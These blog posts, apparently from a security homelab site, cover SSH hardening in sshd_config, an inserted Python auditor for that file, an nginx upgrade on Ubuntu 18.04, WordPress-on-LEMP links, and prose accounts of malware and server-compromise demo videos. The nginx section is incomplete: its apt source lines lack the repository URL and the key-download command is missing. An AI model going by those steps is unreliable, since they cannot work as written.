This is a quick and simple one: we just need to edit the sshd_config file and set PasswordAuthentication and PermitRootLogin to no. Make sure the lines are not commented out with a leading # (the stock file ships them commented), and that no earlier line in the file already sets the same option, because sshd uses the first value it reads for a keyword.

sudo nano /etc/ssh/sshd_config

Disable X11 forwarding (graphical applications over SSH)

This is set in the same file: find X11Forwarding and set it to no. This does not remove any GUI from the server; it stops graphical applications being tunnelled over SSH.

Disconnect idle sessions

Again, in the same file, change ClientAliveInterval and ClientAliveCountMax.

With ClientAliveInterval set to 900 and ClientAliveCountMax set to 0 the server checks once after 15 minutes of inactivity and closes the connection; if you want a longer interval just increase ClientAliveInterval, which is in seconds. Caveat: that behaviour is for the OpenSSH 7.x shipped with Ubuntu 18.04. From OpenSSH 8.2 (Ubuntu 20.04 onwards) a ClientAliveCountMax of 0 disables disconnection altogether, and the ClientAlive checks only detect clients that have stopped responding, not idle ones.

Allow/Deny users

Again in the same file we can provide an allow list of users who are permitted to connect over SSH, using the AllowUsers keyword followed by the usernames. You will need to add this manually to the bottom of the file, but above any Match block, otherwise it becomes part of that block.

Make sure there are no typos and you have added everyone you need to as once this is set if not on the list you will not be able to login via ssh and may be completely locked out of your server. Double check before loading the new config.

To load the new settings, first check the file for syntax errors (sshd needs root to read the host keys, hence sudo).

sudo sshd -t

If you receive an error, go back and check your changes as you have made a mistake somewhere. If not, restart the service to apply the changes (on Ubuntu the unit is called ssh, with sshd as an alias). Keep your current session open and test a new connection before closing it, so a mistake does not lock you out.

sudo service sshd restart
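Before restarting it is worth checking the file the way sshd will read it. The added example below (ours, not from the post) parses an sshd_config with the two rules that catch people out: the first value for a keyword wins, so an option appended at the bottom is ignored if the stock file already sets it, and everything after a Match line belongs to that block. The two configs it checks are constructed; the 15-minute idle values follow the section above.

```python
"""Audit sshd_config against the hardening steps in this post, the way sshd reads it.

Added example, not from the post. Two rules of sshd's parser matter for a safe check:
the FIRST value given for a keyword wins, so a setting appended at the bottom of the
file is ignored if an earlier line already sets it; and every line after a Match
line belongs to that Match block (until the next Match), where it overrides the
global value for connections the block matches. The two configs below are constructed.
Ubuntu 20.04 and later also start the file with `Include /etc/ssh/sshd_config.d/*.conf`;
this checker does not follow includes, and files included at the top take precedence.
"""
import re

# Global settings the post's steps require, and the values sshd uses if a keyword is absent.
REQUIRED = {
    "permitrootlogin": {"no"},
    "passwordauthentication": {"no"},
    "pubkeyauthentication": {"yes"},
    "x11forwarding": {"no"},
}
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
    "x11forwarding": "no",
}
KEYWORD_RE = re.compile(r"^(\S+?)(?:\s*=\s*|\s+)(.*)$")   # 'Key value' or 'Key=value'


def parse_sshd_config(text):
    """Return (global_settings, match_blocks); keys are lower-cased, first occurrence wins."""
    global_cfg, blocks, current = {}, [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):      # sshd only honours whole-line comments
            continue
        m = KEYWORD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            current = {}
            blocks.append((value, current))
            continue
        target = global_cfg if current is None else current
        target.setdefault(key, value)             # first wins, as in sshd
    return global_cfg, blocks


def audit(text):
    """Findings against the post's baseline; an empty list means the file passes."""
    cfg, blocks = parse_sshd_config(text)
    findings = []
    for key, allowed in REQUIRED.items():
        value = cfg.get(key, DEFAULTS[key])
        if value.lower() not in allowed:
            findings.append(f"{key}: is {value!r}, want one of {sorted(allowed)}")
    if int(cfg.get("clientaliveinterval", "0")) == 0:
        findings.append("clientaliveinterval: not set, idle sessions are never checked")
    if "allowusers" not in cfg and "allowgroups" not in cfg:
        findings.append("allowusers/allowgroups: not set, every local account may try to log in")
    for criteria, block in blocks:
        for key, allowed in REQUIRED.items():
            if key in block and block[key].lower() not in allowed:
                findings.append(f"{key}: weakened to {block[key]!r} inside 'Match {criteria}'")
    return findings


WEAK_CONFIG = """
PasswordAuthentication yes
X11Forwarding yes
ClientAliveInterval 0
# appended later in the hope of disabling passwords; sshd ignores it (earlier line wins)
PasswordAuthentication no
Match Address 10.0.0.0/8
    PermitRootLogin yes
"""

HARDENED_CONFIG = """
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
X11Forwarding no
# 900 s then one check. CountMax 0 drops the session on that first check in the
# OpenSSH 7.x of Ubuntu 18.04; on OpenSSH 8.2+ it disables disconnection entirely.
ClientAliveInterval 900
ClientAliveCountMax 0
AllowUsers newuser
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit(cfg) or "passes")
```

Run it with the contents of /etc/ssh/sshd_config before the restart; on a file where the weak sample’s trailing “PasswordAuthentication no” was the only change made, it reports that password logins are still on, which is exactly what sshd -t will not tell you because the file is syntactically fine.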

Well done, in the future we will look at more advanced hardening techniques.

Update nginx to latest version

Believe it or not, if you install nginx on Ubuntu 18.04 from the default repositories then you get nginx 1.14! That release line is no longer maintained upstream; it’s like installing Office 2003 on your new Windows 10 machine, crazy right?

If you have used our quick guide for installing WordPress on the LEMP stack then this is the version you will have installed.

Let’s show how to fix it then….

First up, let’s add the repository by adding a new .list file

sudo nano /etc/apt/sources.list.d/nginx.list

Then add the following lines to tell our install where to go to get the latest version

deb [arch=amd64] bionic nginx
deb-src bionic nginx

CTRL X to exit, then Y to confirm changes and hit enter.

Next we need the nginx public key, so run the following to download it


Then add the key

sudo apt-key add nginx_signing.key

You should get an “OK” message in the console. (apt-key is deprecated on newer Ubuntu releases; there, save the key under /etc/apt/keyrings and reference it from the .list line with a signed-by option instead.)

This is where it gets scary, so if you haven’t backed up, do it now. NO……. do it now.!

We remove all the current version components, but first we make a copy of our config file, just in case.

sudo cp /etc/nginx/nginx.conf /etc/nginx/nginx.conf.old

If you are particularly paranoid you can check it’s there by changing into the directory and listing it

cd /etc/nginx/

A plain “cd” takes us back to our home directory, and we can remove the old version of nginx, but first let’s update apt.

sudo apt-get update
sudo apt remove nginx nginx-common nginx-full nginx-core

‘Y’ to continue, and away it goes

We do not even need to reboot, how cool is that? (This ain’t Windows!) so let’s install the latest version

sudo apt-get install nginx -y

You should get no errors as shown below

Run the next two commands individually

sudo systemctl start nginx
sudo systemctl enable nginx

Then check your version

If you have reinstalled 1.14, then you did not run “sudo apt-get update” after adding the key and the new sources list, doh! (not that I’ve ever done that!)

We are not quite there yet, especially if you have a website already running on the server.

There are 2 additions we need to make if we are using the standard config. (If you have used guides on this site then you will need to do this)

We need to make two changes in the nginx.conf file

sudo nano /etc/nginx/nginx.conf

in this file we need to change “user nginx;” to “user www-data;” which is right at the top.

Then we need to add the following to the bottom of the file “include /etc/nginx/sites-enabled/*;”

Both shown below

Then we reload nginx and we’re done.

sudo systemctl reload nginx

Well done. If it all breaks then I really encourage you to retrace your steps and try and resolve the issue. It’s already broken so who cares if you break it more right? And if it’s that bad, that’s why we made a back-up? You did make a back-up………right?

How to install WordPress on LEMP. (QGR)

This is gonna be the first of a “quick guide with resource links” series where I’ll pick a subject and just post quick links to guides, warn of pitfalls you may encounter, or things you still need to do. (this is for my own future reference as well!)

Hello there……..recently I had to migrate this site to the cloud after years of being hosted in my home lab, and thought I’d do a quick write up while I am at it. Previously I have posted step by step guides for installing my fave stack, but there are so many really good guides I’m just gonna direct you to the best ones out there for the initial install.

Digital Ocean have some great guides online and are generally where I look first for anything LEMP related. I did have a look at Apache, but I do still prefer nginx as my webserver. There is a good article here; if you want to delve into comparisons.

Don’t just follow these word for word; you will need a little bit of knowledge to tailor them to your instance if you’re not using Digital Ocean hosting. If you have followed previous guides on my site you will have enough knowledge to follow these. That’s not to say they aren’t good enough for absolute beginners, but if you follow blindly with no basic concept of LEMP, Ubuntu or Linux you will come unstuck.

Links To Resources

The list of articles below are in order of install;

Initial Server Set-up post-install

Installing the LEMP stack

Installing WordPress on the LEMP stack

Setting up your SSH keys


  • Make sure you note any user account names or passwords you create.
  • Double check, then check again before you disable SSH root login, or password authentication. (You’ll only do it once if you lock yourself out of your own server!)
  • Make a backup before each step. You will mess up, or something will go wrong, just make sure you do not have to start from scratch!

Be aware

  • If you publish a WordPress site on the internet, then within minutes it will be scanned and you will see brute force login attempts. (Even if it is just to blog about the progress of mould on your shower curtain)
  • There is still more to do to ensure your site has a decent level of protection
  • If you create a private key, (for anything) make, make, make sure you keep this private. Don’t make loads of copies and forget to delete them.
  • Don’t assume because you ran “apt update” that you have the latest version of any software. Check manually – We will cover this in the future regarding nginx. (Now up)

That’s it for this, I may come back and add or update if I find something else which helps.

Don’t ignore download warnings

In the next of our short videos we show why download warnings should not be ignored. We are using a Windows 7 machine just for ease, this will also work in Windows 10 (I haven’t gotten around to updating all my test victim machines yet!)

When you are browsing the internet and trying to find what you are looking for; one thing you can guarantee is that there will be thousands of malicious sites pretending to be the website you need.

Here our user is looking for some free software to play a video file, after a google search goes to a site they think will have what they want. The site prompts that they need to update their browser, how responsible of them to make sure I am up to date. The update is downloaded, and the browser warns there is an issue with this. However the user is impatient and just wants the software, ignores the warning and installs it. That’s why they have anti-virus right? If it is malicious that what it’s there for.

They continue with the download and run the file, and on the left-hand machine you will see (as in previous videos) just how quickly this happens, and just how quickly the cyber criminal can take screenshots, pop messages on the screen, and control the machine, which we show by launching Windows programs such as Calculator and Notepad.

The importance of updating

Another quick video to show just how quickly a server can be compromised and taken over completely by an attacker.

In this video we have a server running an out of date and un-patched application, which gives the attacker a way onto the server. Then the attacker dumps and cracks the password hashes, which gives persistent remote (using ssh) access to the system. The attacker can then continue to access the server for whatever purpose they wish

Then the attacker changes the root (admin) password potentially resulting in no one else having admin access to the system. Allowing them to hold the system to ransom or threatening to take it off line to disrupt the business function, or continue to search and remove data unhindered.

This all happens in under 4 minutes. Always stay as up to date with versions and patches as possible.